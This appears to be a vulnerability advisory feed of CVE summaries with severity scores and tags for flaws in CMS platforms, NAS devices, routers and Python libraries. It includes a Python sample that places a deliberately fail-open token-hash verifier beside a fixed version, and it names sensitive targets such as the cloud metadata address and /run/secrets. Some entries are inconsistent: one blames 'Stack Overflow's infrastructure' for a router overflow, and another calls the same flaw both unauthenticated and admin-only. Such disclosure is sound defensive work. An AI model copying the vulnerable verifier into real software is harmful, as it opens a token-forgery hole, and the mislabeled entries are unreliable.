Glances web server exposes its REST API without authentication by default when started with the -w flag, allowing unauthenticated remote attackers to access sensitive system information including process details that may contain credentials such as passwords and API keys. The vulnerability affects Python and Docker deployments where Glances is exposed to untrusted networks due to the server binding to 0.0.0.0 with authentication disabled by default. A patch is available to address this configuration vulnerability.
Python
Docker
Information Disclosure
-
CVE-2026-32268
HIGH
The DefaultController->actionLoadContainerData() endpoint in the Microsoft plugin permits unauthenticated attackers possessing a valid CSRF token to enumerate accessible storage buckets and extract sensitive data from Azure error messages. This authorization bypass affects users running unpatched versions prior to 2.1.1, exposing cloud storage infrastructure details and potentially sensitive system information through verbose error responses.
Information Disclosure
Authentication Bypass
Microsoft
CSRF
-
CVE-2026-32264
HIGH
CVSS 7.2
Remote code execution in Craft CMS allows authenticated administrators with control panel access to execute arbitrary code by exploiting an incomplete patch that left the same vulnerable gadget chain pattern in multiple controllers. The vulnerability requires administrative privileges and the allowAdminChanges setting to be enabled, limiting exposure to trusted users with elevated access. Craft CMS versions before 4.17.5 and 5.9.11 are affected and should be patched immediately.
PHP
Information Disclosure
-
CVE-2026-32263
HIGH
CVSS 7.2
Unsafe deserialization of untrusted user input in PHP Craft CMS allows authenticated high-privilege users to inject arbitrary Yii2 behaviors and event handlers, enabling remote code execution through the EntryTypesController. An incomplete prior patch for a similar vulnerability left the same dangerous pattern in place, permitting attackers with administrative access to manipulate application configuration and achieve full system compromise. A patch is available to properly sanitize configuration inputs before processing.
Code Injection
PHP
-
CVE-2026-32261
HIGH
CVSS 8.5
A vulnerability in the rendering of user-supplied template content (CVSS 8.5) is exploitable by an authenticated user with access to that feature. High severity vulnerability requiring prompt remediation. Vendor patch is available.
RCE
PHP
-
CVE-2026-31386
HIGH
CVSS 7.2
OpenLiteSpeed and LSWS Enterprise web servers contain an OS command injection vulnerability that allows attackers with administrative privileges to execute arbitrary system commands. All versions of both products are affected according to EUVD data. While requiring high privileges limits the attack surface, successful exploitation grants complete system control with high impact to confidentiality, integrity, and availability (CVSS 7.2).
Command Injection
Lsws Enterprise
Openlitespeed
-
CVE-2026-30881
HIGH
CVSS 8.8
Authenticated attackers can exploit SQL injection in Chamilo LMS versions before 1.11.36 through the statistics AJAX endpoint, where insufficient input sanitization allows the database escaping mechanisms to be bypassed via the date_start and date_end parameters. This enables blind time-based SQL injection to extract or manipulate sensitive data in the underlying database. Version 1.11.36 contains the patch; versions 1.11.35 and earlier remain vulnerable.
SQLi
Chamilo Lms
-
CVE-2026-30875
HIGH
CVSS 8.8
An arbitrary file upload vulnerability in Chamilo LMS allows authenticated users with Teacher role to achieve Remote Code Execution by uploading malicious H5P packages. The flaw affects versions prior to 1.11.36 and stems from inadequate validation of H5P package contents, which only checks for h5p.json existence but fails to block .htaccess or PHP files with alternative extensions. With a CVSS score of 8.8 and high exploitation potential, attackers can upload webshells disguised as text files along with .htaccess configurations to bypass security controls.
PHP
RCE
File Upload
Code Injection
Chamilo Lms
-
CVE-2026-30405
HIGH
CVSS 7.5
GoBGP gobgpd version 4.2.0 is vulnerable to denial of service when processing malformed NEXT_HOP path attributes, allowing unauthenticated remote attackers to crash the BGP daemon with no user interaction. This affects BGP infrastructure relying on the vulnerable version, and no patch is available at this time. The attack requires only network access to the BGP service, making it easily exploitable in environments running affected versions.
Denial Of Service
-
CVE-2026-29112
HIGH
CVSS 7.5
The @dicebear/converter library before version 9.4.0 fails to validate SVG dimension attributes, allowing attackers to trigger excessive memory allocation by providing crafted SVGs with extremely large width and height values. Server-side applications processing untrusted or user-supplied SVGs through the conversion functions (toPng, toJpeg, toWebp, toAvif) are vulnerable to denial of service attacks. A patch is available in version 9.4.0 and users should upgrade immediately if processing external SVG inputs.
Denial Of Service
-
CVE-2026-28500
HIGH
CVSS 8.6
ONNX's hub.load() function can be bypassed to load untrusted models without user confirmation when the silent parameter is enabled, allowing attackers to potentially deliver malicious models to applications that suppress security warnings. The vulnerability stems from improper logic in the repository trust verification mechanism that prioritizes the silent flag over security checks. This affects Python-based systems using ONNX and could lead to unauthorized code execution through model loading.
Python
Information Disclosure
Redhat
Suse
-
CVE-2026-28498
HIGH
CVSS 7.5
Authlib's OpenID Connect ID Token validation silently passes verification when encountering unsupported cryptographic algorithms, allowing attackers to bypass hash integrity checks on forged tokens. This fail-open behavior in the `_verify_hash` function affects applications using Authlib for OIDC authentication and could enable token forgery attacks. A patch is available.
Python
RCE
Redhat
Suse
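The fail-open shape described above, as an added illustration rather than Authlib's `_verify_hash`: the `at_hash`/`c_hash` claim is the base64url-encoded left half of the digest of the access token or code, using the hash implied by the ID token's `alg` (OpenID Connect Core 3.1.3.6 and 3.3.2.11). The vulnerable verifier returns True when it cannot map `alg` to a digest; the fixed one raises. Token values and the unsupported algorithm name are constructed.

```python
import base64
import hashlib
import hmac

# Hash function implied by the ID token's signing algorithm (OpenID Connect Core 3.1.3.6 / 3.3.2.11).
HASH_FOR_ALG = {
    "HS256": "sha256", "RS256": "sha256", "ES256": "sha256", "PS256": "sha256",
    "HS384": "sha384", "RS384": "sha384", "ES384": "sha384", "PS384": "sha384",
    "HS512": "sha512", "RS512": "sha512", "ES512": "sha512", "PS512": "sha512",
}


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def expected_hash(value: str, alg: str):
    """Left-most half of the digest of the access token / code, base64url, or None if alg is unknown."""
    digest_name = HASH_FOR_ALG.get(alg)
    if digest_name is None:
        return None
    digest = hashlib.new(digest_name, value.encode()).digest()
    return b64url(digest[: len(digest) // 2])


def verify_hash_vulnerable(claim_value: str, token_value: str, alg: str) -> bool:
    expected = expected_hash(token_value, alg)
    if expected is None:
        return True  # fail open: an alg the code does not know is treated as "nothing to check"
    return hmac.compare_digest(expected, claim_value)


def verify_hash_fixed(claim_value: str, token_value: str, alg: str) -> bool:
    expected = expected_hash(token_value, alg)
    if expected is None:
        raise ValueError(f"cannot verify at_hash/c_hash: unsupported alg {alg!r}")
    return hmac.compare_digest(expected, claim_value)


def demo():
    access_token = "constructed-access-token"  # constructed
    good_claim = expected_hash(access_token, "RS256")
    forged_claim = "bogus"
    forged_alg = "XX999"  # constructed unsupported alg
    try:
        verify_hash_fixed(forged_claim, access_token, forged_alg)
        fixed_rejected = False
    except ValueError:
        fixed_rejected = True
    return (
        verify_hash_fixed(good_claim, access_token, "RS256"),
        verify_hash_fixed("bogus", access_token, "RS256"),
        verify_hash_vulnerable(forged_claim, access_token, forged_alg),
        fixed_rejected,
    )
```

In practice the `alg` reaching this check should already have been pinned by the signature verification step, so an unsupported value here is a sign that the two steps disagree about which algorithm list is trusted; failing closed keeps that disagreement from becoming a bypass.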
-
CVE-2026-27459
HIGH
CVSS 7.2
Buffer overflow in pyOpenSSL's cookie generation callback allows attackers to corrupt memory and potentially achieve remote code execution by supplying oversized cookie values exceeding 256 bytes. The vulnerability affects applications using custom cookie callbacks with OpenSSL integration, where insufficient length validation permits writing beyond allocated buffer boundaries. A patch is available that implements proper cookie size validation.
OpenSSL
Buffer Overflow
Redhat
Suse
-
CVE-2026-25369
HIGH
CVSS 7.1
A reflected Cross-Site Scripting (XSS) vulnerability exists in the Flexmls® IDX WordPress plugin through version 3.15.9, allowing attackers to inject malicious scripts into web pages that execute in victims' browsers when they click specially crafted links. The vulnerability has a CVSS score of 7.1 and requires user interaction but can impact confidentiality, integrity, and availability across different origins due to its scope change characteristic. While not currently listed in CISA KEV or showing high EPSS scores, the vulnerability represents a moderate risk for WordPress sites using this real estate listing plugin.
XSS
-
CVE-2026-25083
HIGH
CVSS 8.3
An authorization bypass exists in GROWI's OpenAI assistant API endpoints, where authorization checks are missing, allowing any authenticated user to access and manipulate other users' AI assistant conversations. The vulnerability affects GROWI versions 7.4.5 and earlier, enabling attackers with low-level credentials to compromise the confidentiality and integrity of AI assistant threads and messages simply by knowing the assistant identifier. While not currently listed in CISA KEV and with no public exploit code identified, the vulnerability carries a high CVSS score of 8.3 due to its low exploitation complexity and significant data exposure potential.
Authentication Bypass
AI / ML
Growi
-
CVE-2026-24458
HIGH
CVSS 7.5
Mattermost 10.11.x through 11.3.x fails to validate password length, allowing unauthenticated attackers to trigger denial of service by submitting multi-megabyte passwords during login attempts that consume excessive CPU and memory resources. The vulnerability affects all versions up to 10.11.10, 11.2.2, and 11.3.0, with no patch currently available.
Denial Of Service
Mattermost
Suse
-
CVE-2026-23862
HIGH
CVSS 7.8
Dell ThinOS 10 versions before 2602_10.0573 contain a command injection flaw that allows local attackers with low privileges to execute arbitrary commands and escalate their access rights. The vulnerability stems from improper sanitization of special elements in user-supplied input, requiring only local access and no user interaction to exploit. No patch is currently available.
Dell
Command Injection
-
CVE-2026-21005
HIGH
CVSS 7.1
A path traversal vulnerability in Smart Switch (CVSS 7.1) exploitable by adjacent attackers. High severity vulnerability requiring prompt remediation.
Path Traversal
-
CVE-2026-21000
HIGH
CVSS 7.0
Galaxy Store versions prior to 4.6.03.8 contain an access control flaw that enables local attackers to create files with elevated Galaxy Store privileges. This vulnerability affects local users on affected devices and could allow privilege escalation or persistence mechanisms. No patch is currently available.
Path Traversal
-
CVE-2026-20999
HIGH
CVSS 7.1
Smart Switch versions prior to 3.7.69.15 contain a replay attack vulnerability in the authentication mechanism that allows remote attackers to bypass security controls and execute privileged functions without valid credentials. The vulnerability requires user interaction to trigger but poses a significant risk as no patch is currently available. Organizations using affected Smart Switch deployments should implement network-level controls to restrict access until an update is released.
Authentication Bypass
-
CVE-2026-20998
HIGH
CVSS 7.1
Samsung Smart Switch versions prior to 3.7.69.15 contain an authentication bypass vulnerability that allows unauthenticated remote attackers to circumvent security controls. This vulnerability could enable attackers to gain unauthorized access to the application without valid credentials. No patch is currently available for this high-severity issue.
Authentication Bypass
-
CVE-2026-20996
HIGH
CVSS 7.1
A cryptographic downgrade vulnerability in Samsung Smart Switch allows remote attackers to force the application to use weak authentication schemes during device-to-device transfers. The vulnerability affects Smart Switch versions prior to 3.7.69.15 and requires user interaction to exploit, potentially exposing sensitive data during the transfer process between Samsung devices. With a CVSS 4.0 score of 7.1 and no current evidence of active exploitation or public proof-of-concept code, this represents a moderate risk primarily to Samsung device users performing data migrations.
Information Disclosure
-
CVE-2026-20994
HIGH
CVSS 7.0
A URL redirection vulnerability in Samsung Account allows remote attackers to potentially steal user access tokens through malicious redirect chains. The vulnerability affects Samsung Account versions prior to 15.5.01.1 and requires user interaction to exploit. While not currently in CISA's Known Exploited Vulnerabilities catalog, the issue has a moderate CVSS score of 7.0 and could lead to account takeover if successfully exploited.
Information Disclosure
Samsung
Open Redirect
Samsung Account
-
CVE-2026-20990
HIGH
CVSS 8.1
Samsung's Secure Folder prior to the March 2026 SMR release improperly exports Android application components, enabling local attackers to execute arbitrary activities with Secure Folder privileges. This high-severity vulnerability affects users with local device access and could allow privilege escalation or unauthorized access to protected data. No patch is currently available.
Information Disclosure
Google
Android
-
CVE-2026-4276
HIGH
CVSS 7.5
CVE-2026-4276 is a security vulnerability (CVSS 7.5) exploitable by attackers. High severity vulnerability requiring prompt remediation.
Code Injection
Rag Api
-
CVE-2026-4269
HIGH
CVSS 7.5
Remote code execution in Bedrock AgentCore Starter Toolkit versions before v0.1.13 allows unauthenticated attackers to inject malicious code during the build process by exploiting missing S3 ownership verification, affecting only users who built the toolkit after September 24, 2025. An attacker can achieve arbitrary code execution within the AgentCore Runtime environment. Users must upgrade to v0.1.13 to remediate this vulnerability; no fix is available for earlier versions.
RCE
-
CVE-2026-4255
HIGH
CVSS 8.4
A DLL search order hijacking vulnerability in Thermalright TR-VISION HOME allows local attackers to execute arbitrary code with administrative privileges through DLL side-loading. The vulnerability affects versions up to 2.0.5 and occurs because the application loads DLLs using Windows' default search order without verifying integrity or signatures, allowing malicious DLLs placed in writable directories to be loaded when the application runs. No active exploitation has been reported (not in KEV), no public POC is available, and EPSS data is not yet available for this CVE.
RCE
Microsoft
Tr Vision Home
Windows
-
CVE-2026-4252
HIGH
CVSS 8.9
An authentication bypass vulnerability exists in Tenda AC8 router firmware version 16.03.50.11, where the IPv6 handler function check_is_ipv6 relies on the client IP address for authentication, allowing remote attackers to gain unauthorized access. A proof-of-concept exploit is publicly available on GitHub, and the flaw can be exploited without authentication to fully compromise the affected device. While not currently listed in CISA KEV, the combination of public exploit availability and ease of exploitation makes this a high-priority vulnerability for organizations using affected Tenda routers.
Tenda
Information Disclosure
-
CVE-2026-4237
HIGH
CVSS 7.3
SQL injection in Free Hotel Reservation System 1.0 allows unauthenticated remote attackers to manipulate the Home parameter in /hotel/admin/mod_reports/index.php and execute arbitrary database queries. Public exploit code exists for this vulnerability, and no patch is currently available. Affected systems running the vulnerable PHP application are at immediate risk of data theft and database compromise.
SQLi
PHP
Free Hotel Reservation System
-
CVE-2026-4236
HIGH
CVSS 7.3
SQL injection in itsourcecode Online Enrollment System 1.0 allows unauthenticated remote attackers to manipulate parameters in the enrollment module via the txtsearch, deptname, or name arguments. Public exploit code exists for this vulnerability, which enables attackers to read, modify, or delete database contents. No patch is currently available.
SQLi
PHP
Online Enrollment System
-
CVE-2026-4235
HIGH
CVSS 7.3
SQL injection in itsourcecode Online Enrollment System 1.0 allows unauthenticated remote attackers to manipulate the user_email parameter in /sms/login.php and execute arbitrary database queries. Public exploit code exists for this vulnerability, enabling attackers to read, modify, or delete sensitive enrollment data without authentication. No patch is currently available.
SQLi
PHP
Online Enrollment System
-
CVE-2026-4232
HIGH
CVSS 7.3
SQL injection in Tiandy Integrated Management Platform 7.17.0 via the /rest/user/getAuthorityByUserId endpoint allows unauthenticated remote attackers to manipulate the userId parameter and execute arbitrary SQL queries. Public exploit code exists for this vulnerability, and the vendor has not released a patch despite early notification. Successful exploitation could enable unauthorized data access, modification, or system disruption.
SQLi
Integrated Management Platform
-
CVE-2026-4231
HIGH
CVSS 7.3
Server-side request forgery in Vanna AI versions up to 2.0.2 allows unauthenticated remote attackers to manipulate the update_sql and run_sql endpoints in the Flask component. Public exploit code exists for this vulnerability, and no patch is currently available from the vendor despite early notification.
Python
SSRF
AI / ML
Vanna
-
CVE-2026-4229
HIGH
CVSS 7.3
SQL injection in Vanna AI's BigQuery integration (versions up to 2.0.2) allows unauthenticated remote attackers to manipulate the remove_training_data function through unsanitized ID parameters. Public exploit code exists for this vulnerability, and the vendor has not released a patch despite early notification. Successful exploitation enables attackers to read, modify, or delete database contents with limited impact on confidentiality, integrity, and availability.
Google
SQLi
AI / ML
Vanna
-
CVE-2026-4227
HIGH
CVSS 8.8
Remote code execution in LB-LINK BL-WR9000 2.4.9 via buffer overflow in the /goform/get_hidessid_cfg endpoint allows authenticated attackers to achieve complete system compromise over the network. Public exploit code exists for this vulnerability, and the vendor has not provided a patch despite early notification. An attacker with login credentials can trigger the overflow in the sub_44D844 function to execute arbitrary code with full system privileges.
Buffer Overflow
-
CVE-2026-4226
HIGH
CVSS 8.8
Stack Overflow's infrastructure contains a stack-based buffer overflow in a virtual configuration function that can be exploited remotely by authenticated attackers to achieve complete system compromise. Public exploit code is available for this vulnerability, and no patch has been released despite vendor notification. An attacker with valid credentials can manipulate input to the vulnerable endpoint and execute arbitrary code with full system privileges.
Buffer Overflow
Stack Overflow
-
CVE-2026-4223
HIGH
CVSS 7.3
SQL injection in itsourcecode Payroll Management System 1.0 via the ID parameter in /manage_employee.php allows unauthenticated remote attackers to execute arbitrary SQL queries and access or modify sensitive data. Public exploit code exists for this vulnerability, and no patch is currently available. Organizations running this system should implement network-level protections and consider upgrading to a patched version once released.
PHP
SQLi
-
CVE-2026-4221
HIGH
CVSS 7.3
An unrestricted file upload vulnerability exists in the Tiandy Easy7 Integrated Management Platform version 7.17.0, specifically in the /rest/file/uploadLedImage endpoint. This vulnerability allows remote attackers without authentication to upload arbitrary files, potentially leading to remote code execution. A proof-of-concept exploit has been publicly released and the vendor has not responded to disclosure attempts, leaving this vulnerability unpatched and actively exploitable.
File Upload
Easy7 Integrated Management Platform
-
CVE-2026-4220
HIGH
CVSS 7.3
An unrestricted file upload vulnerability exists in Technologies Integrated Management Platform version 7.17.0 that allows remote attackers to upload malicious files without authentication through the /SetWebpagePic.jsp endpoint by manipulating the targetPath/Suffix parameters. A public proof-of-concept exploit is available, although the vulnerability is not currently in CISA's Known Exploited Vulnerabilities catalog. With demonstrated attack code, this is a confirmed exploitable vulnerability that could lead to unauthorized file uploads and potential remote code execution.
File Upload
Integrated Management Platform
-
CVE-2026-4214
HIGH
CVSS 8.8
Stack-based buffer overflow in D-Link NAS devices (DNS-120, DNR-202L, DNS-315L, DNS-320 series, DNS-326, DNS-1100-4, and others) through the UPnP_AV_Server_Path_Setting function in /cgi-bin/app_mgr.cgi allows authenticated remote attackers to achieve complete system compromise with high integrity, confidentiality, and availability impact. Public exploit code exists for this vulnerability, and no patch is currently available.
Buffer Overflow
D-Link
Stack Overflow
Dns 320lw
Dns 323
-
CVE-2026-4213
HIGH
CVSS 8.8
Stack-based buffer overflow in D-Link DNS storage appliances (DNS-120, DNS-340L, DNS-1200-05 and others) through the /cgi-bin/gui_mgr.cgi endpoint allows remote authenticated attackers to achieve code execution. Public exploit code exists for this vulnerability, and no patch is currently available. Affected firmware versions are dated up to February 5, 2026.
Stack Overflow
Buffer Overflow
D-Link
Dns 120
Dns 340l
-
CVE-2026-4212
HIGH
CVSS 8.8
Stack-based buffer overflow in D-Link DNS NAS devices (DNS-120 through DNS-1550-04) allows authenticated attackers to achieve remote code execution via the Downloads_Schedule_Info function in /cgi-bin/download_mgr.cgi. Public exploit code exists for this vulnerability, and no patch is currently available. The attack requires valid credentials but can be executed over the network with high impact on confidentiality, integrity, and availability.
D-Link
Buffer Overflow
Stack Overflow
Dns 1550 04
Dns 343
-
CVE-2026-4211
HIGH
CVSS 8.8
Stack-based buffer overflow in D-Link DNS and DNR network storage devices allows authenticated remote attackers to execute arbitrary code by manipulating the f_idx parameter in the local_backup_mgr.cgi endpoint. Public exploit code exists for this vulnerability, which affects multiple device models up to firmware version 20260205 with no patch currently available. An attacker with valid credentials can trigger memory corruption to achieve complete system compromise including code execution, data theft, and service disruption.
D-Link
Buffer Overflow
Stack Overflow
Dns 315l
Dns 120
-
CVE-2026-4201
HIGH
CVSS 7.3
An unrestricted file upload vulnerability exists in the glowxq-oj online judge system that allows remote attackers without authentication to upload malicious files through the SysFileController Upload function. A proof-of-concept exploit is publicly available, and while not currently in CISA's KEV catalog, the vulnerability poses moderate risk with a CVSS score of 7.3 and publicly disclosed exploitation code.
Java
File Upload
Glowxq Oj
-
CVE-2026-4200
HIGH
CVSS 7.3
Server-side request forgery in Glowxq OJ's test case upload functionality (ProblemCaseController.java) allows unauthenticated remote attackers to make arbitrary network requests from the affected server. Public exploit code is available and the vulnerability remains unpatched, with the vendor unresponsive to disclosure attempts.
Java
SSRF
Glowxq Oj
-
CVE-2026-4194
HIGH
CVSS 7.3
Improper access controls in D-Link NAS devices (DNS-120, DNS-323, DNS-345, DNS-1200-05, and others through firmware version 20260205) allow unauthenticated remote attackers to manipulate the cgi_set_wto function in /cgi-bin/system_mgr.cgi, potentially gaining unauthorized access or modifying system settings. Public exploit code exists for this vulnerability, and no patch is currently available.
D-Link
Dns
Privilege Escalation
Authentication Bypass
-
CVE-2026-3476
HIGH
CVSS 7.8
A code injection vulnerability in SOLIDWORKS Desktop releases 2025 through 2026 allows attackers to execute arbitrary code on victim machines by tricking users into opening specially crafted files. The vulnerability requires local access and user interaction but provides complete system compromise with high impact to confidentiality, integrity, and availability (CVSS 7.8). No evidence of active exploitation or proof-of-concept code has been reported.
RCE
Code Injection
Solidworks Desktop
-
CVE-2026-3110
HIGH
CVSS 8.7
An Insecure Direct Object Reference (IDOR) vulnerability in Campus Educativa allows unauthenticated attackers to access sensitive user data including usernames, full names, email addresses, and phone numbers of all enrolled students by manipulating course IDs in the export endpoint. The vulnerability requires no authentication and can be exploited remotely through simple URL manipulation and brute-force attacks on course IDs. With a CVSS score of 8.7 and network-based attack vector, this represents a critical data exposure risk for educational institutions using Campus Educativa.
Information Disclosure
Campus
-
CVE-2026-3022
HIGH
CVSS 7.1
A non-relational SQL injection (NoSQLi) vulnerability exists in the Wakyma veterinary web application, specifically in the hospitalization summary generation endpoint at vets.wakyma.com. Authenticated users with low privileges can inject NoSQL commands into POST requests to exfiltrate customer reports containing sensitive veterinary and pet owner data. The vulnerability has a high CVSS score of 7.1 but requires authentication, limiting the attack surface to users with valid credentials.
SQLi
Wakyma Application Web
-
CVE-2026-3020
HIGH
CVSS 8.6
An identity-based authorization bypass vulnerability (IDOR) allows authenticated attackers to modify other users' account data, including email addresses, and subsequently hijack accounts through password reset flows. The vulnerability affects an unspecified product with a CVSS 8.6 severity rating, requires only low privileges to exploit over the network, and enables complete account takeover. No active exploitation has been reported (not in KEV), no public proof-of-concept exists, and the EPSS score is unavailable.
Authentication Bypass
Wakyma Application Web
-
CVE-2026-2476
HIGH
CVSS 7.6
A sensitive information disclosure vulnerability in Mattermost Plugins versions 2.0.3.0 and earlier: the application fails to properly mask sensitive configuration values in support packets, allowing attackers with high privileges to extract original plugin settings from exported configuration data. Exploitation requires authenticated access with high privileges (CVSS 7.6) and yields configuration data that should have been masked, potentially exposing API keys, credentials, or other sensitive plugin settings. No active exploitation or proof-of-concept has been reported.
Information Disclosure
Suse
-
CVE-2025-69784
HIGH
CVSS 8.8
A local, non-privileged attacker can abuse a vulnerable IOCTL interface exposed by the OpenEDR 2.5.1.0 kernel driver to modify the DLL injection path used by the product.
RCE
-
CVE-2025-69783
HIGH
CVSS 7.8
A local attacker can bypass OpenEDR's 2.5.1.0 self-defense mechanism by renaming a malicious executable to match a trusted process name (e.g., csrss.exe, edrsvc.exe, edrcon.exe).
Privilege Escalation
-
CVE-2025-69768
HIGH
CVSS 7.5
SQL injection vulnerability in Chyrp v.2.5.2 and before allows a remote attacker to obtain sensitive information via the Admin.php component.
PHP
SQLi
-
CVE-2025-69240
HIGH
CVSS 7.5
A host header injection vulnerability in Raytha CMS allows attackers to hijack password reset tokens by spoofing X-Forwarded-Host or Host headers, leading to account takeover. The vulnerability affects all versions prior to 1.4.6 and requires only that the attacker knows the victim's email address to initiate the attack chain. With a CVSS 7.5 score and requiring user interaction, this represents a significant authentication bypass risk for organizations using the affected CMS versions.
Information Disclosure
Authentication Bypass
Raytha
-
CVE-2025-66687
HIGH
CVSS 7.5
Doom Launcher 3.8.1.0 is vulnerable to directory traversal due to missing file path validation during the extraction of game files.
Path Traversal
-
CVE-2025-50881
HIGH
CVSS 8.8
The `flow/admin/moniteur.php` script in Use It Flow administration website before 10.0.0 is vulnerable to Remote Code Execution.
PHP
RCE
Code Injection
-
CVE-2025-15587
HIGH
CVSS 8.6
A privilege escalation vulnerability in Tinycontrol network management devices (tcPDU and LAN Controllers) allows low-privileged users to retrieve administrator passwords by directly accessing resources that are hidden from the graphical interface. The vulnerability affects multiple product lines including tcPDU, LK3.5, LK3.9, and LK4 controllers across various hardware versions, with a high CVSS score of 8.6 indicating significant risk. No evidence of active exploitation exists (not in KEV), no public POC is available, and the EPSS score is not provided, but patches are available for all affected versions.
Information Disclosure
Authentication Bypass
Lan Kontroler V3.5
Tcpdu
Lk4
-
CVE-2025-15540
HIGH
CVSS 8.8
A code injection vulnerability in Raytha CMS's Functions module allows privileged users to execute arbitrary .NET operations through unrestricted JavaScript code execution, effectively bypassing application sandboxing. The vulnerability affects Raytha CMS versions prior to 1.4.6 and enables authenticated administrators to compromise the application's hosting environment. No active exploitation has been reported (not in KEV), no public POC is available, and EPSS data is not yet available for this recently disclosed vulnerability.
RCE
Code Injection
Raytha
-
CVE-2025-11500
HIGH
CVSS 8.7
An authentication bypass vulnerability in Tinycontrol network devices (tcPDU and LAN Controllers LK3.5, LK3.9, LK4) exposes usernames and encoded passwords for both normal and admin users through unauthenticated HTTP requests to the login page. The vulnerability affects devices running older firmware versions when the secondary authentication mechanism is disabled (default setting), allowing any attacker on the local network to harvest credentials without authentication. With an EPSS score of 0.00043 and no KEV listing, this vulnerability shows low real-world exploitation activity despite its high CVSS score of 8.7.
Information Disclosure
Lan Kontroler V3.5
Lk3.9
Tcpdu
Lk4
-
CVE-2025-10685
HIGH
CVSS 7.7
Heap-based buffer overflow vulnerability in Softing Industrial Automation GmbH smartLink SW-PN and smartLink SW-HT (Webserver modules) allows buffers to be overflowed. This issue affects smartLink SW-PN through 1.03 and smartLink SW-HT through 1.42.
Heap Overflow
Buffer Overflow
-
CVE-2017-20222
HIGH
CVSS 7.5
An unauthenticated remote reboot vulnerability exists in the Telesquare SKT LTE Router SDT-CS3B1 firmware version 1.2.0, allowing attackers to trigger device restarts without any authentication by sending specially crafted POST requests to the lte.cgi endpoint. This vulnerability has a publicly available proof-of-concept exploit and enables denial of service attacks against affected routers. The vulnerability has been assigned a high CVSS score of 7.5 due to the complete availability impact and lack of authentication requirements.
Denial Of Service
Authentication Bypass
Sdt Cs3b1
-
CVE-2026-32812
MEDIUM
CVSS 6.8
An unauthenticated Server-Side Request Forgery (SSRF) and Local File Read vulnerability exists in the Admidio SSO metadata fetch endpoint, which accepts arbitrary URLs via a GET parameter and passes them directly to file_get_contents() after validating only with PHP's FILTER_VALIDATE_URL, a format checker that does not block dangerous URI schemes. An authenticated administrator can exploit this to read arbitrary local files (including database credentials from config.php), probe internal network services, or fetch cloud instance metadata (such as AWS IAM credentials from 169.254.169.254). A proof-of-concept demonstrating all attack vectors has been published; CVSS 6.8 reflects high confidentiality impact but is mitigated by the requirement for administrator privileges.
CSRF
Elastic
PHP
Microsoft
SSRF
-
CVE-2026-32777
MEDIUM
CVSS 4.0
libexpat before version 2.7.5 contains an infinite loop vulnerability triggered during DTD (Document Type Definition) parsing, allowing local attackers to cause a denial of service condition. The vulnerability affects all applications and libraries that depend on libexpat for XML parsing, with a CVSS score of 4.0 reflecting limited severity due to local-only attack vector and availability impact. While the CVSS base score is moderate, the infinite loop condition presents a real denial of service risk for services that parse untrusted XML documents containing malicious DTD content.
Denial Of Service
Libexpat
-
CVE-2026-32776
MEDIUM
CVSS 4.0
libexpat before version 2.7.5 contains a NULL pointer dereference vulnerability triggered by malformed XML containing empty external parameter entity content, resulting in denial of service through application crashes. The vulnerability affects all versions of libexpat prior to 2.7.5 across multiple platforms and applications that embed this XML parsing library. An attacker with local access can craft a malicious XML document to crash any application using vulnerable libexpat, though the impact is limited to availability (CVSS 4.0) with no code execution or data compromise possible.
Denial Of Service
Null Pointer Dereference
Libexpat
-
CVE-2026-32758
MEDIUM
CVSS 6.5
Path traversal in the resourcePatchHandler allows authenticated users with Create or Rename permissions to bypass access control rules by injecting path traversal sequences (`..\`) into PATCH requests, since validation occurs before path normalization. An attacker can exploit this to copy or rename files to restricted directories that should be protected by administrator-configured deny rules. No patch is currently available.
Path Traversal
-
CVE-2026-32757
MEDIUM
CVSS 5.4
Admidio's eCard functionality is vulnerable to stored XSS when authenticated users send greeting cards, as the application uses unsanitized POST data instead of properly filtered values during email construction. An authenticated attacker can inject malicious HTML and JavaScript into eCard emails sent to other members, bypassing the HTMLPurifier sanitization that occurs during form validation. No patch is currently available for this vulnerability affecting PHP-based Admidio installations.
PHP
XSS
-
CVE-2026-32755
MEDIUM
CVSS 5.7
Admidio's profile membership management function fails to validate CSRF tokens on the save_membership action, allowing an attacker to forge requests that modify membership start and end dates for any member of roles led by the victim. While other membership-related actions (stop_membership, remove_former_membership) include CSRF protection, save_membership was omitted from validation, enabling silent privilege escalation or access revocation through cross-site request forgery. A proof-of-concept exists demonstrating immediate exploitation by embedding a form on an external page.
CSRF
PHP
-
CVE-2026-32750
MEDIUM
CVSS 6.8
SiYuan Note contains an unrestricted path traversal vulnerability in the POST /api/import/importStdMd endpoint that allows authenticated administrators to recursively import arbitrary files from the host filesystem into the workspace database without any validation or blocklisting. Affected versions of SiYuan (pkg:go/github.com_siyuan-note_siyuan) allow admin users to permanently store sensitive files such as /proc/, /etc/, /run/secrets/, and other system directories as searchable note content, making them accessible to other workspace users including those with limited privileges. A proof-of-concept has been published demonstrating import of /proc/1/ and /run/secrets/, and when chained with separate SQL injection vulnerabilities in the renderSprig template function, non-admin users can retrieve imported secrets without additional privileges.
Path Traversal
SQLi
Docker
-
CVE-2026-32747
MEDIUM
CVSS 6.8
Administrative users of Docker and PostgreSQL deployments can exploit an incomplete path validation in the `POST /api/file/globalCopyFiles` endpoint to copy sensitive files like container environment variables and Docker secrets from restricted locations (`/proc/`, `/run/secrets/`) into the workspace, where they become readable via standard file APIs. The vulnerability stems from reliance on a blocklist-based validation mechanism that fails to prevent access to these critical system paths. Since no patch is currently available, organizations should restrict administrative access to the affected API endpoint until an update is released.
Docker
PostgreSQL
Path Traversal
-
CVE-2026-32723
MEDIUM
SandboxJS 0.8.34 contains a race condition where a shared global tick state allows concurrent sandboxes to interfere with each other's execution quotas during timer callback compilation. An attacker in a multi-tenant environment can exploit this to bypass resource limits and exhaust CPU/memory on the host system. A patch is available.
Race Condition
Denial Of Service
Node.js
-
CVE-2026-32632
MEDIUM
CVSS 5.9
The Glances system monitoring application accepts arbitrary HTTP Host headers on its REST API and WebUI endpoints, enabling DNS rebinding attacks that bypass browser same-origin policy and expose sensitive system data. While the MCP endpoint was recently hardened with host validation, the main FastAPI application for REST/WebUI/token routes lacks equivalent TrustedHostMiddleware protection, allowing attackers to rebind attacker-controlled domains to the victim's local Glances instance and read API responses as same-origin content. A proof-of-concept is code-validated through source inspection, and a patch is available in version 4.5.2 and later.
Python
RCE
-
CVE-2026-32587
MEDIUM
CVSS 5.4
WP EasyPay versions up to 4.2.11 contain an authorization bypass that allows authenticated users to modify plugin settings and functionality beyond their intended access level. An attacker with valid credentials could exploit improperly configured access controls to perform unauthorized actions such as disabling security features or altering payment processing configurations. No patch is currently available for this vulnerability.
Authentication Bypass
Wp Easypay
-
